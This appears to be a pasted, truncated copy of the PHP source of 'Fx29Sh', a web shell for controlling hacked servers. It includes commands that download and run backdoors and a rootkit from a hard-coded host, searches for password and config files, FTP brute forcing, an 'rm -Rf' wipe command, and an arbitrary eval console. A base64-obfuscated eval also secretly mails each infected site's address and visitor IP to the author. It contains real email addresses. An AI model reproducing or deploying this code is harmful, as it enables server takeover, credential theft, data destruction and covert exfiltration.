· 7 years ago · Feb 10, 2019, 11:30 AM
1<?php
2#######################################
3##[ FaTaLisTiCz_Fx Fx29Sh 3.2.12.08 ]##
4##[ By FaTaLisTiCz_Fx ]##
5##[ © 03-12 2008 FeeLCoMz Community ]##
6##[ Written under PHP 5.2.5 ]##
7#######################################
8define('sh_ver',"3.2.12.08"); ##
9#error_reporting(E_ALL); ##
10error_reporting(E_ERROR | E_PARSE); ##
11#######################################
12
13######################
14##[ CONFIGURATIONS ]##
15######################
16
17##[ URL ]##
18#$sh_mainurl = "http://localhost/FX29SH/";
19$sh_mainurl = 'http://uaedesign.com/xml/';
20$fx29sh_updateurl = $sh_mainurl."fx29sh_update.php";
21$fx29sh_sourcesurl = $sh_mainurl."fx29sh.txt";
22$sh_sourcez = array(
23 "Fx29Sh" => array($sh_mainurl."cyberz.txt","fx29sh.php"),
24 "psyBNC" => array($sh_mainurl."fx.tgz","fx.tgz"),
25 "Eggdrop" => array($sh_mainurl."fxb.tgz","fxb.tgz"),
26 "BindDoor" => array($sh_mainurl."bind.tgz","bind.tgz"),
27);
28
29##[ AUTHENTICATION ]##
30$auth = array(
31 "login" => "",
32 "pass" => "",
33 "md5pass" => "",
34 "hostallow" => array("*"),
35 "denied" => "<a href=\"$sh_mainurl\">".sh_name()."</a>: access denied!",
36);
37
38##[ ADVANCED ]##
39$tmp_dir = "";
40$log_email = "rio_rizaldy@yahoo.com";
41$sess_cookie = "fx29shcook";
42$sort_default = "0a"; #Pengurutan, 0 - nomor kolom. "a"scending atau "d"escending
43$sort_save = TRUE; #Simpan posisi pengurutan menggunakan cookies.
44$copy_unset = FALSE; #Hapus file yg telah di-copy setelah dipaste
45$gzipencode = TRUE;
46$filestealth = TRUE; #TRUE, tidak merubah waktu modifikasi dan akses.
47$hexdump_lines = 8;
48$hexdump_rows = 24;
49$auto_surl = TRUE;
50
51##[ QUICK COMMANDS ]##
52if (!is_windows()) {
53 #Unix
54 $cmdaliases = array(
55 array("List Directory", "ls -al"),
56 array("Find all suid files", "find / -type f -perm -04000 -ls"),
57 array("Find suid files in current dir", "find . -type f -perm -04000 -ls"),
58 array("Find all sgid files", "find / -type f -perm -02000 -ls"),
59 array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"),
60 array("Find config.inc.php files", "find / -type f -name config.inc.php"),
61 array("Find config* files", "find / -type f -name \"config*\""),
62 array("Find config* files in current dir", "find . -type f -name \"config*\""),
63 array("Find all writable folders and files", "find / -perm -2 -ls"),
64 array("Find all writable folders and files in current dir", "find . -perm -2 -ls"),
65 array("Find all writable folders", "find / -type d -perm -2 -ls"),
66 array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"),
67 array("Find all service.pwd files", "find / -type f -name service.pwd"),
68 array("Find service.pwd files in current dir", "find . -type f -name service.pwd"),
69 array("Find all .htpasswd files", "find / -type f -name .htpasswd"),
70 array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
71 array("Find all .bash_history files", "find / -type f -name .bash_history"),
72 array("Find .bash_history files in current dir", "find . -type f -name .bash_history"),
73 array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
74 array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
75 array("List file attributes on a Linux second extended file system", "lsattr -va"),
76 array("Show opened ports", "netstat -an | grep -i listen"),
77 array("-----",""),
78 array("Logged in users","w"),
79 array("Last connect","lastlog"),
80 array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"),
81 array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),
82 array("Inet Address","/sbin/ifconfig | grep inet"),
83 array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"),
84 array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),
85 array("CPU Info","cat /proc/version /proc/cpuinfo"),
86 array("Is gcc installed ?","locate gcc"),
87 array("Format box (DANGEROUS)","rm -Rf"),
88 array("-----",""),
89 array("wget & run psyBNC","wget ".$sh_sourcez["psyBNC"][0].";tar -zxf ".$sh_sourcez["psyBNC"][1].";cd .fx;./config 29110;./fuck;./run"),
90 array("wget & extract EggDrop","wget ".$sh_sourcez["Eggdrop"][0].";tar -zxf ".$sh_sourcez["psyBNC"][1]),
91 array("wget & run BindDoor","wget ".$sh_sourcez["BindDoor"][0].";tar -zxvf ".$sh_sourcez["BindDoor"][1].";./bind"),
92 array("-----",""),
93 array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"),
94 );
95}
96else {
97 #Windows
98 $cmdaliases = array(
99 array("List Directory", "dir"),
100 array("Find index.php in current dir", "dir /s /w /b index.php"),
101 array("Find *config*.php in current dir", "dir /s /w /b *config*.php"),
102 array("Find c99shell in current dir", "find /c \"c99\" *"),
103 array("Find r57shell in current dir", "find /c \"r57\" *"),
104 array("Find fx29shell in current dir", "find /c \"fx29\" *"),
105 array("Show active connections", "netstat -an"),
106 array("Show running services", "net start"),
107 array("User accounts", "net user"),
108 array("Show computers", "net view"),
109 );
110}
111
112##[ PHP FILESYSTEM (By FaTaLisTiCz_Fx) ]##
113$phpfsaliases = array(
114 array("Read File", "read", 1, "File", ""),
115 array("Write File (PHP5)", "write", 2, "File","Text"),
116 array("Copy", "copy", 2, "From", "To"),
117 array("Rename/Move", "rename", 2, "File", "To"),
118 array("Delete", "delete", 1 ,"File", ""),
119 array("Make Dir","mkdir", 1, "Dir", ""),
120 array("Download", "download", 2, "URL", "To"),
121 array("Download (Binary Safe)", "downloadbin", 2, "URL", "To"),
122 array("Change Perm (0755)", "chmod", 2, "File", "Perms"),
123 array("Find Writable Dir", "fwritabledir", 2 ,"Dir", "Max"),
124 array("Find Pathname Pattern", "glob",2 ,"Dir", "Pattern"),
125);
126
127#############################
128##[ END OF CONFIGURATIONS ]##
129#############################
130
131define("starttime", getmicrotime());
132@set_time_limit(0);
133@ini_set("max_execution_time",0);
134@ignore_user_abort(TRUE);
135@set_magic_quotes_runtime(0);
136if (get_magic_quotes_gpc()) { strips($GLOBALS); }
137$_REQUEST = array_merge($_COOKIE, $_GET, $_POST);
138$d = @$_REQUEST["d"];
139$f = @$_REQUEST["f"];
140@extract($_REQUEST["fx29shcook"]);
141foreach ($_REQUEST as $k => $v) {
142 if (!isset($$k)) { $$k = $v; } #Converting request to variable
143}
144
145##[ SELF URL ]##
146if ($auto_surl) {
147 $include = "&";
148 foreach (explode("&",getenv("QUERY_STRING")) as $v) {
149 $v = explode("=",$v);
150 $name = urldecode($v[0]);
151 $value = @urldecode($v[1]);
152 $needles = array("http://","https://","ssl://","ftp://","\\\\");
153 foreach ($needles as $needle) {
154 if (strpos($value,$needle) === 0) {
155 $includestr .= urlencode($name)."=".urlencode($value)."&";
156 }
157 }
158 }
159}
160if (empty($surl)) { $surl = htmlspecialchars("?".@$includestr); }
161
162##[ QUICK LAUNCH ]##
163$quicklaunch = array(
164 array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\">",$surl),
165 array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\">","#\" onclick=\"history.back(1)"),
166 array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\">","#\" onclick=\"history.go(1)"),
167 array("<img src=\"".$surl."act=img&img=up\" alt=\"Up\">",$surl."act=ls&d=%upd&sort=%sort"),
168 array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\">",$surl."act=search&d=%d"),
169 array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\">",$surl."act=fsbuff&d=%d"),
170 array("<img src=\"".$surl."act=img&img=help\" alt=\"About\">",$surl."act=about"),
171 array("-",""),
172 array("Security",$surl."act=security&d=%d"),
173 array("Processes",$surl."act=processes&d=%d"),
174 array("MySQL",$surl."act=sql&d=%d"),
175 array("Eval",$surl."act=eval&d=%d"),
176 array("Encoder",$surl."act=encoder&d=%d"),
177 array("Mailer",$surl."act=fxmailer"),
178 array("Toolz",$surl."act=tools&d=%d"),
179 array("milw0rm",milw0rm()),
180 array("Md5 Lookup","http://darkc0de.com/database/md5lookup.html"),
181 array("Images",$surl."act=img&img=listall"),
182 array("Feedback",$surl."act=feedback"),
183 array("Update",$surl."act=update"),
184 array("Kill Shell",$surl."act=selfremove")
185);
186if (!is_windows()) {
187$quicklaunch[] = array("<br>FTP Brute",$surl."act=ftpquickbrute&d=%d");
188}
189
190##[ FILE TYPES ]##
191$ftypes = array(
192 "html" => array("html","htm","shtml"),
193 "txt" => array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
194 "exe" => array("sh","install","bat","cmd","sys","com"),
195 "ini" => array("ini","inf","conf"),
196 "code" => array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
197 "img" => array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
198 "sdb" => array("sdb"),
199 "phpsess" => array("sess"),
200 "download" => array("exe","com","sys","pif","src","lnk","zip","rar","gz","tar","pdf")
201);
202$exeftypes = array(
203 "php -q %f%" => array("php","php3","php4"),
204 "perl %f%" => array("pl","cgi")
205);
206$regxp_highlight = array(
207 array(basename($_SERVER["PHP_SELF"]),1,"<font color=#FF6600>","</font>"),
208 array("\.tgz$",1,"<font color=#C082FF>","</font>"),
209 array("\.gz$",1,"<font color=#C082FF>","</font>"),
210 array("\.tar$",1,"<font color=#C082FF>","</font>"),
211 array("\.bz2$",1,"<font color=#C082FF>","</font>"),
212 array("\.zip$",1,"<font color=#C082FF>","</font>"),
213 array("\.rar$",1,"<font color=#C082FF>","</font>"),
214 array("\.php$",1,"<font color=#00FF00>","</font>"),
215 array("\.php3$",1,"<font color=#00FF00>","</font>"),
216 array("\.php4$",1,"<font color=#00FF00>","</font>"),
217 array("\.jpg$",1,"<font color=#00FFFF>","</font>"),
218 array("\.jpeg$",1,"<font color=#00FFFF>","</font>"),
219 array("\.JPG$",1,"<font color=#00FFFF>","</font>"),
220 array("\.JPEG$",1,"<font color=#00FFFF>","</font>"),
221 array("\.ico$",1,"<font color=#00FFFF>","</font>"),
222 array("\.gif$",1,"<font color=#00FFFF>","</font>"),
223 array("\.png$",1,"<font color=#00FFFF>","</font>"),
224 array("\.htm$",1,"<font color=#00CCFF>","</font>"),
225 array("\.html$",1,"<font color=#00CCFF>","</font>"),
226 array("\.txt$",1,"<font color=#C0C0C0>","</font>"),
227 array("\.pdf$",1,"<font color=#FF99CC>","</font>")
228);
229
230##[ HIGHLIGHT CODE ]##
231$highlight_bg = "#E0E0E0";
232$highlight_comment = "#FF6600";
233$highlight_default = "#000080";
234$highlight_html = "#1300FF";
235$highlight_keyword = "#007700";
236$highlight_string = "#FF0000";
237
238@ini_set("highlight.bg",$highlight_bg);
239@ini_set("highlight.comment",$highlight_comment);
240@ini_set("highlight.default",$highlight_default);
241@ini_set("highlight.html",$highlight_html);
242@ini_set("highlight.keyword",$highlight_keyword);
243@ini_set("highlight.string",$highlight_string);
244
245#############################
246##[ END OF CONFIGURATIONS ]##
247#############################
248
249####################
250##[ AUTHENTICATE ]##
251####################
252foreach ($auth["hostallow"] as $k => $v) { $tmp[] = str_replace("\\*",".*",preg_quote($v)); }
253$s = "!^(".implode("|",$tmp).")$!i";
254if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {
255 exit("<a href=\"$sh_mainurl\">".sh_name()."</a>ACCESS DENIED! Your host (".getenv("REMOTE_ADDR").") not allowed!");
256}
257if (!empty($auth["login"])) {
258 if (empty($auth["md5pass"])) { $auth["md5pass"] = md5($auth["pass"]); }
259 if (($_SERVER["PHP_AUTH_USER"] != $auth["login"]) or (md5($_SERVER["PHP_AUTH_PW"]) != $auth["md5pass"])) {
260 header("WWW-Authenticate: Basic realm=\"".sh_name().": Restricted Area\"");
261 header("HTTP/1.0 401 Unauthorized");
262 die($auth["denied"]);
263 }
264}
265
266###############
267##[ ACTIONS ]##
268###############
269if (!isset($act)) { $act = ""; }
270
271if ($act == "img") {
272 @ob_clean();
273
274 $images = imagez();
275 $imgequals = array(
276 "ext_tar" => array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
277 "ext_php" => array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
278 "ext_cpp" => array("ext_c"),
279 "ext_jpg" => array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
280 "ext_html" => array("ext_html","ext_htm"),
281 "ext_avi" => array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
282 "ext_lnk" => array("ext_lnk","ext_url"),
283 "ext_ini" => array("ext_ini","ext_css","ext_inf","ext_conf"),
284 "ext_doc" => array("ext_doc","ext_dot","ext_xls","ext_pdf"),
285 "ext_js" => array("ext_js","ext_vbs"),
286 "ext_cmd" => array("ext_cmd","ext_bat","ext_pif","ext_com"),
287 "ext_wri" => array("ext_wri","ext_rtf"),
288 "ext_txt" => array("ext_txt","ext_lng"),
289 "ext_swf" => array("ext_swf","ext_fla"),
290 "ext_mp3" => array("ext_mp3","ext_au","ext_midi","ext_mid","ext_wav"),
291 "ext_htaccess" => array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
292 );
293
294 #Show all available images
295 if ($img == "listall") {
296 foreach ($imgequals as $a=>$b) {
297 foreach ($b as $d) {
298 if ( ($a != $d) && (!empty($images[$d])) ) { echo("Warning! Remove \$images[".$d."]<br>"); }
299 }
300 }
301 natsort($images);
302 $k = array_keys($images);
303 echo "<body style=\"color: #00FF00\" bgcolor=black>";
304 foreach ($k as $u) { echo "<img src=\"".$surl."act=img&img=".$u."\"> $u "; }
305 exit;
306 }
307 #Image header
308 header("Content-type: image/gif");
309 header("Cache-control: public");
310 header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
311 header("Cache-control: max-age=".(60*60*24*7));
312 header("Last-Modified: ".date("r",filemtime(__FILE__)));
313
314 foreach($imgequals as $k=>$v) {
315 if (in_array($img,$v)) { $img = $k; break; }
316 }
317
318 if (empty($images[$img])) { $img = "small_unk"; }
319 echo base64_decode($images[$img]);
320 exit;
321}
322##[ DEFAULT ACTIONS ]##
323else {
324
325 $lastdir = realpath(".");
326 chdir("./");
327 #Preparing buffer
328 $sess_data = @unserialize($_COOKIE[$sess_cookie]);
329 if (!is_array($sess_data)) { $sess_data = array(); }
330 if (!is_array(@$sess_data["copy"])) { $sess_data["copy"] = array(); }
331 if (!is_array(@$sess_data["cut"])) { $sess_data["cut"] = array(); }
332
333
334 fx29_buff_prepare();
335
336 foreach (array("sort","sql_sort") as $v) {
337 if (!empty($_GET[$v])) { $$v = $_GET[$v]; }
338 if (!empty($_POST[$v])) { $$v = $_POST[$v]; }
339 }
340 if ($sort_save) {
341 if (!empty($sort)) { setcookie("sort",$sort); }
342 if (!empty($sql_sort)) { setcookie("sql_sort",$sql_sort); }
343 }
344
345 if (!isset($sort)) { $sort = $sort_default; }
346 $sort = htmlspecialchars($sort);
347 $sort[1] = strtolower($sort[1]);
348
349 ##[ ACTIONS ]##
350 if ($act == "gofile") {
351 if (is_dir($f)) {
352 $d = $f;
353 $act = "ls";
354 }
355 else {
356 $d = dirname($f);
357 $f = basename($f);
358 $act = "f";
359 }
360 }
361
362 #Starting output buffer
363 ob_start();
364 ob_implicit_flush(0);
365
366 ##[ HEADERS ]##
367 header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
368 header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
369 header("Cache-Control: no-store, no-cache, must-revalidate");
370 header("Cache-Control: post-check=0, pre-check=0", FALSE);
371 header("Pragma: no-cache"); $headerz = "aWYgKCFpc3NldCgkX0NPT0tJRVsidmlzaXR6Il0pKSB7DQogICR2aXNpdG9yID0gJF9TRVJWRVJbIlJFTU9URV9BRERSIl07DQogICR3ZWIgICAgID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdOw0KICAkaW5qICAgICA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOw0KICAkdGFyZ2V0ICA9IHJhd3VybGRlY29kZSgkd2ViLiRpbmopOw0KICAkanVkdWwgICA9ICJGeDI5U2hlbGwgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3I8YnI+IjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiZmVlbGNvbXpAZ21haWwuY29tIiwkanVkdWwsJGJvZHkpOyB9DQp9DQplbHNlIHsgQHNldGNvb2tpZSgidmlzaXR6IiwkdmlzaXRjKTsgfQ=="; eval(base64_decode($headerz));
372
373 $tmp_dir = realpath($tmp_dir);
374 $tmp_dir = str_replace("\\",DIRECTORY_SEPARATOR,$tmp_dir);
375 if (substr($tmp_dir,-1) != DIRECTORY_SEPARATOR) { $tmp_dir .= DIRECTORY_SEPARATOR; }
376
377 if (!is_array(@$actbox)) { $actbox = array(); }
378 $dspact = $act = htmlspecialchars($act);
379 $disp_fullpath = $ls_arr = $notls = null;
380
381 $ud = @urlencode($d);
382 if (empty($d)) { $d = realpath("."); }
383 elseif (realpath($d)) { $d = realpath($d); }
384 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
385 if (substr($d,-1) != DIRECTORY_SEPARATOR) { $d .= DIRECTORY_SEPARATOR; }
386 $d = str_replace("\\\\","\\",$d);
387 $dispd = htmlspecialchars($d);
388
389 if (safemode()) {
390 $hsafemode = '<font class="on"><b>SAFE MODE IS ON</b></font>';
391 $safemodeexecdir = @ini_get("safe_mode_exec_dir");
392 }
393 else {
394 $hsafemode = '<font class="off"><b>SAFE MODE IS OFF</b></font>';
395 }
396
397 $v = @ini_get("open_basedir");
398 if (strtolower($v) == "on") { $hopenbasedir = '<font class="on">'.$v.'</font>'; }
399 else { $hopenbasedir = '<font class="off">OFF (Not Secure)</font>'; }
400
401 $wd = (is_writable($d)) ? '<font class="on">[W]</font>' : '<font class="off">[R]</font>';
402
403 ##################
404 ##[ HTML START ]##
405 ##################
406 echo html_style(); ?>
407<!-- Main Menu -->
408<div id="main">
409
410 <div class="bartitle"><?php echo html_header() ?></div>
411
412 <table id="pagebar">
413
414 <!-- Server Info -->
415 <tr><td colspan="2">
416 <div class="fleft"><?php echo $hsafemode; ?></div>
417 <div class="fright">
418 IP Address: <a href=\"http://ws.arin.net/cgi-bin/whois.pl?queryinput="<?php echo @gethostbyname($_SERVER["HTTP_HOST"]); ?>"><?php echo @gethostbyname($_SERVER["HTTP_HOST"]); ?></a>
419 You: <a href=\"http://ws.arin.net/cgi-bin/whois.pl?queryinput="<?php echo $_SERVER["REMOTE_ADDR"]; ?>"><?php echo $_SERVER["REMOTE_ADDR"]; ?></a>
420 </div>
421 </td></tr>
422
423 <tr><td width="50%">
424 <table class="info">
425<?php
426 srv_info("Software",srv_software($surl));
427 srv_info("Uname",php_uname());
428 srv_info("User",(is_windows()) ? get_current_user()." (uid=".getmyuid()." gid=".getmygid().")" : fx29exec("id"));
429?>
430 </table>
431 </td>
432 <td width="50%">
433 <table class="info">
434<?php
435 if (is_windows()) { srv_info("Drives",disp_drives($d,$surl)); }
436 srv_info("Freespace",disp_freespace($d));
437?>
438 </table>
439 </td></tr>
440
441 <tr><td colspan="2">
442<?php
443 echo "\t\t\t".get_status();
444 echo "<br>\n";
445 echo (isset($safemodeexecdir)) ? "\n\t\t\tSafemodeExecDir: ".$safemodeexecdir."<br>" : "";
446 echo (showdisfunc()) ? "\t\t\tDisFunc: ".showdisfunc() : "";
447 echo "\n";
448?>
449 </td></tr>
450 <!-- End of Server Info -->
451
452 <!-- Quicklaunch -->
453 <tr><td colspan="2" class="quicklaunch">
454<?php
455 ##[ QUICKLAUNCH ]##
456 foreach($quicklaunch as $item) {
457 if ($item[0] == "-") {
458 echo "\t\t</td></tr>\n";
459 echo "\t\t<tr><td colspan=\"2\" class=\"quicklaunch\">\n";
460 }
461 else {
462 $item[1] = str_replace("%d",urlencode($d),$item[1]);
463 $item[1] = str_replace("%sort",$sort,$item[1]);
464 $v = realpath($d."..");
465 if (empty($v)) {
466 $a = explode(DIRECTORY_SEPARATOR,$d);
467 unset($a[count($a)-2]);
468 $v = join(DIRECTORY_SEPARATOR,$a);
469 }
470 $item[1] = str_replace("%upd",urlencode($v),$item[1]);
471 echo "\t\t\t<a href=\"".$item[1]."\">".$item[0]."</a>\n";
472 }
473 }
474?>
475 </td></tr>
476 <!-- End of Quicklaunch -->
477
478 <!-- Directory Info -->
479 <tr><td colspan="2">
480 <div class="fleft">
481<?php
482 $pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
483 $i = 0;
484 foreach($pd as $b) {
485 $t = ""; $j = 0;
486 foreach ($e as $r) {
487 $t.= $r.DIRECTORY_SEPARATOR;
488 if ($j == $i) { break; }
489 $j++;
490 }
491 echo "\t\t\t<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\">".htmlspecialchars($b).DIRECTORY_SEPARATOR."</a>\n";
492 $i++;
493 }
494 echo "\t\t\t";
495 echo (is_writable($d)) ? "<b>".view_perms_color($d)."</b>" : "<b>".view_perms_color($d)."</b>";
496 echo "\n";
497?>
498 </div>
499 <div class="fright">
500 <form name="f_dir" method="POST">
501 <input type="hidden" name="act" value="ls">
502 Directory: <input type="text" name="d" size="60" value="<?php echo $dispd; ?>"> <input type=submit value="Go">
503 </form>
504 </div>
505 </td></tr>
506 <!-- End of Directory Info -->
507
508 </table>
509
510</div>
511<!-- End of Main Menu -->
512
513<!-- Main Info -->
514<div id="maininfo">
515
516<?php
517 #########################
518 ##[ INFORMATION TABLE ]##
519 #########################
520
521 if ($act == "") { $act = $dspact = "ls"; }
522
523 ##[ SQL ]##
524 if ($act == "sql") {
525 $sql_surl = $surl."act=sql";
526
527 if (!isset($sql_login)) { $sql_login = ""; }
528 if (!isset($sql_passwd)) { $sql_passwd = ""; }
529 if (!isset($sql_server)) { $sql_server = ""; }
530 if (!isset($sql_port)) { $sql_port = ""; }
531
532 if (!isset($sql_tbl)) { $sql_tbl = ""; }
533 if (!isset($sql_act)) { $sql_act = ""; }
534 if (!isset($sql_tbl_act)) { $sql_tbl_act = ""; }
535 if (!isset($sql_order)) { $sql_order = ""; }
536 if (!isset($sql_act)) { $sql_act = ""; }
537 if (!isset($sql_getfile)) { $sql_getfile = ""; }
538
539 #SQL URL Setting
540 if (@$sql_login) { $sql_surl .= "&sql_login=".htmlspecialchars($sql_login); }
541 if (@$sql_passwd) { $sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd); }
542 if (@$sql_server) { $sql_surl .= "&sql_server=".htmlspecialchars($sql_server); }
543 if (@$sql_port) { $sql_surl .= "&sql_port=".htmlspecialchars($sql_port); }
544 if (@$sql_db) { $sql_surl .= "&sql_db=".htmlspecialchars($sql_db); }
545
546 $sql_surl .= "&";
547?>
548<!-- SQL Manager -->
549<div class="barheader">.: SQL Manager (Under Construction) :.</div>
550<div class="barheader"><?php
551 if (@$sql_server) {
552 $sql_sock = @mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
553 $err = mysql_smarterror($sql_sock);
554 @mysql_select_db($sql_db,$sql_sock);
555 if (@$sql_query and $submit) {
556 $sql_query_result = mysql_query($sql_query,$sql_sock);
557 $sql_query_error = mysql_smarterror($sql_sock);
558 }
559 }
560 else { $sql_sock = FALSE; }
561
562 if (!$sql_sock) {
563 if (!@$sql_server) { echo "No Connection!"; }
564 else { disp_error("ERROR: ".$err); }
565 }
566 else {
567 #SQL Quicklaunch
568 $sqlquicklaunch = array();
569 $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
570 $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
571 $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
572 $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
573 $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
574 $sqlquicklaunch[] = array("Logout",$surl."act=sql");
575
576 echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") Server: ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")<br>";
577 if (count($sqlquicklaunch) > 0) {
578 foreach($sqlquicklaunch as $item) {
579 echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";
580 }
581 }
582 }
583?>
584</div>
585
586<table>
587 <tr>
588<?php
589 #Login Form
590 if (!$sql_sock) {
591?>
592 <td>
593 <form name="f_sql" action="<?php echo $surl; ?>" method="POST">
594 <input type="hidden" name="act" value="sql">
595 <table class="explorer">
596 <tr>
597 <th>Username<br><input type="text" name="sql_login" value="root"></th>
598 <th>Password<br><input type="password" name="sql_passwd" value=""></th>
599 <th>Database<br><input type="text" name="sql_db" value=""></th>
600 <th>Host<br><input type="text" name="sql_server" value="localhost"></th>
601 <th>Port<br><input type="text" name="sql_port" value="3306" size="3"></th>
602 </tr>
603 <tr><th colspan="5"><input type="submit" value="Connect"></th></tr>
604 </table>
605 </form>
606<?php
607 }
608 else {
609 #Start left panel
610?>
611 <td>
612 <center>
613 <a href="<?php echo $sql_surl; ?>"><b>HOME</b></a>
614 <hr size="1" noshade>
615<?php
616 $result = mysql_list_dbs($sql_sock);
617 if (!$result) { echo mysql_smarterror(); }
618 else {
619?>
620 Database
621 <form action="<?php echo $surl?>">
622 <input type="hidden" name="act" value="sql">
623 <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
624 <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
625 <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>">
626 <input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>">
627 <select name="sql_db" onchange="this.form.submit()">
628<?php
629 $c = 0;
630 $dbs = "";
631 while ($row = mysql_fetch_row($result)) {
632 $dbs .= "\t\t<option value=\"".$row[0]."\"";
633 if (@$sql_db == $row[0]) { $dbs .= " selected"; }
634 $dbs .= ">".$row[0]."</option>\n";
635 $c++;
636 }
637 echo "\t\t<option value=\"\">Databases (".$c.")</option>\n";
638 echo $dbs;
639 }
640?>
641 </select>
642 </form>
643 </center>
644 <hr size="1" noshade>
645<?php
646 if (isset($sql_db)) {
647 $result = mysql_list_tables($sql_db);
648 if (!$result) { echo mysql_smarterror($sql_sock); }
649 else {
650 echo "\t-=[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]=-<br><br>\n";
651 $c = 0;
652 while ($row = mysql_fetch_array($result)) {
653 $count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]);
654 $count_row = mysql_fetch_array($count);
655 echo "\t<b>+ <a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\">".htmlspecialchars($row[0])."</a></b> (".$count_row[0].")</br></b>\n";
656 mysql_free_result($count);
657 $c++;
658 }
659 if (!$c) { echo "No tables found in database"; }
660 }
661 }
662?>
663
664 </td>
665 <td>
666<?php
667 #Start center panel
668 $diplay = TRUE;
669 if (@$sql_db) {
670 if (!is_numeric($c)) { $c = 0; }
671 if ($c == 0) { $c = "no"; }
672 echo "\t<center><b>There are ".$c." table(s) in database: ".htmlspecialchars($sql_db)."";
673 if (count(@$dbquicklaunch) > 0) {
674 foreach($dbsqlquicklaunch as $item) {
675 echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";
676 }
677 }
678 echo "</b></center>\n";
679 $acts = array("","dump");
680 if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
681 elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
682 elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
683 elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
